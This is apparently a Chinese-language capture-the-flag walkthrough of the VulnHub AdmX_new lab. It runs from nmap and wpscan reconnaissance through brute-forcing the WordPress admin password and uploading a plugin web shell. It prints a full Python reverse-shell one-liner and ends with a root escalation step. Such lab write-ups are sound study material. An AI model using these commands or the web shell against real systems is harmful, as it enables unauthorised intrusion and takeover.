一、靶场介绍
1.下载地址:https://download.vulnhub.com/admx/AdmX_new.7z
2.将靶机网络适配器改为NAT模式
3.启动靶机
二、信息收集
1.主机发现
nmap -sn 192.168.111.1/24
2.端口扫描
nmap -A 192.168.111.136 -p 1-65535
3.目录扫描
feroxbuster --url http://192.168.111.136
这里图片忘记截了
4.网页访问
三、渗透流程
1.页面访问慢,查看请求都指向了192.168.159.145
2.利用BP,将地址进行替换,再重新访问
3.利用wpscan爆出用户名admin
wpscan --url http://10.0.2.7/wordpress --enumerate
4.利用BP爆破admin密码
5.在/wordpress/wp-admin使用admin/adam14进行登录
6.上传.zip木马文件
网页尝试访问
http://192.168.111.136/wordpress/wp-content/plugins/1.php?cmd=id
7.kali开启监听,网页执行shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.129",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'
反弹成功
8.查看当前用户权限
9.尝试访问权限目录
10.获取root权限,提权成功
\! /bin/bash